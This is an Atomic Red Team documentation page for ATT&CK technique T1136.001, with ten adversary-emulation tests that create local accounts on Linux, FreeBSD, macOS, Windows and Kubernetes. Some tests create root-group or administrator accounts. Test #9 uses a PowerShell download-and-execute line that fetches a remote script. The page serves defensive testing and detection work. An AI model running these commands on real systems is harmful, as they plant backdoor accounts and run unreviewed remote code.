Atomic Red Team doc generator
10 KiB
T1136.001 - Create Account: Local Account
Description from ATT&CK
Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
For example, with a sufficient level of access, the Windows
net user /addcommand can be used to create a local account. In Linux, theuseraddcommand can be used, while on macOS systems, thedscl -createcommand can be used. Local accounts may also be added to network devices, often via common Network Device CLI commands such asusername, to ESXi servers viaesxcli system account add, or to Kubernetes clusters using thekubectlutility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)Adversaries may also create new local accounts on network firewall management consoles – for example, by exploiting a vulnerable firewall management system, threat actors may be able to establish super-admin accounts that could be used to modify firewall rules and gain further access to the network.(Citation: Cyber Security News)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Atomic Tests
- Atomic Test #1: Create a user account on a Linux system
- Atomic Test #2: Create a user account on a FreeBSD system
- Atomic Test #3: Create a user account on a MacOS system
- Atomic Test #4: Create a new user in a command prompt
- Atomic Test #5: Create a new user in PowerShell
- Atomic Test #6: Create a new user in Linux with
rootUID and GID. - Atomic Test #7: Create a new user in FreeBSD with
rootGID. - Atomic Test #8: Create a new Windows admin user
- Atomic Test #9: Create a new Windows admin user via .NET
- Atomic Test #10: Create a Linux user via kubectl in a Pod
Atomic Test #1: Create a user account on a Linux system
Create a user via useradd
Supported Platforms: Linux
auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | evil_user |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
useradd -M -N -r -s /bin/bash -c evil_account #{username}
Cleanup Commands
userdel #{username}
Atomic Test #2: Create a user account on a FreeBSD system
Create a user via pw
Supported Platforms: Linux
auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | evil_user |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account
Cleanup Commands
rmuser -y #{username}
Atomic Test #3: Create a user account on a MacOS system
Creates a user on a MacOS system with dscl
Supported Platforms: macOS
auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | evil_user |
| realname | 'realname' to record when creating the user | string | Evil Account |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
Cleanup Commands
dscl . -delete /Users/#{username}
Atomic Test #4: Create a new user in a command prompt
Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD"
Supported Platforms: Windows
auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | T1136.001_CMD |
| password | Password of the user to create | string | T1136.001_CMD! |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
net user /add "#{username}" "#{password}"
Cleanup Commands
net user /del "#{username}" >nul 2>&1
Atomic Test #5: Create a new user in PowerShell
Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell"
Supported Platforms: Windows
auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | T1136.001_PowerShell |
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
New-LocalUser -Name "#{username}" -NoPassword
Cleanup Commands
Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
Atomic Test #6: Create a new user in Linux with root UID and GID.
Creates a new user in Linux and adds the user to the root group. This technique was used by adversaries during the Butter attack campaign.
Supported Platforms: Linux
auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | butter |
| password | Password of the user to create | string | BetterWithButter |
Attack Commands: Run with bash! Elevation Required (e.g. root or admin)
useradd -g 0 -M -d /root -s /bin/bash #{username}
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
Cleanup Commands
userdel #{username}
Atomic Test #7: Create a new user in FreeBSD with root GID.
Creates a new user in FreeBSD and adds the user to the root group. This technique was used by adversaries during the Butter attack campaign.
Supported Platforms: Linux
auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | butter |
| password | Password of the user to create | string | BetterWithButter |
Attack Commands: Run with sh! Elevation Required (e.g. root or admin)
pw useradd #{username} -g 0 -d /root -s /bin/sh
echo "#{password}" | pw usermod #{username} -h 0
Cleanup Commands
pw userdel #{username}
Atomic Test #8: Create a new Windows admin user
Creates a new admin user in a command prompt.
Supported Platforms: Windows
auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | string | T1136.001_Admin |
| password | Password of the user to create | string | T1136_pass |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
net user /add "#{username}" "#{password}"
net localgroup administrators "#{username}" /add
Cleanup Commands
net user /del "#{username}" >nul 2>&1
Atomic Test #9: Create a new Windows admin user via .NET
Creates a new admin user in a powershell session without using net.exe
Supported Platforms: Windows
auto_generated_guid: 2170d9b5-bacd-4819-a952-da76dae0815f
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
Atomic Test #10: Create a Linux user via kubectl in a Pod
Launches a short-lived Alpine pod and creates a Linux user inside the pod. The pod is automatically deleted after execution.
Supported Platforms: Containers
auto_generated_guid: d9efa6c7-6518-42b2-809a-4f2a8e242b9b
Inputs
| Name | Description | Type | Default Value |
|---|---|---|---|
| pod_name | K8s pod_name to execute the command in | string | atomic-linux-useradd |
| username | Username of the user to create inside the pod | string | evil_user |
| image_name | Name of the docker image | string | alpine |
Attack Commands: Run with bash!
kubectl run #{pod_name} --image=#{image_name} --restart=Never --rm -it -- sh -lc 'adduser -D #{username} && id #{username}'
Dependencies: Run with bash!
Description: kubectl must be installed and configured
Check Prereq Commands
which kubectl
Get Prereq Commands
echo "kubectl must be installed manually"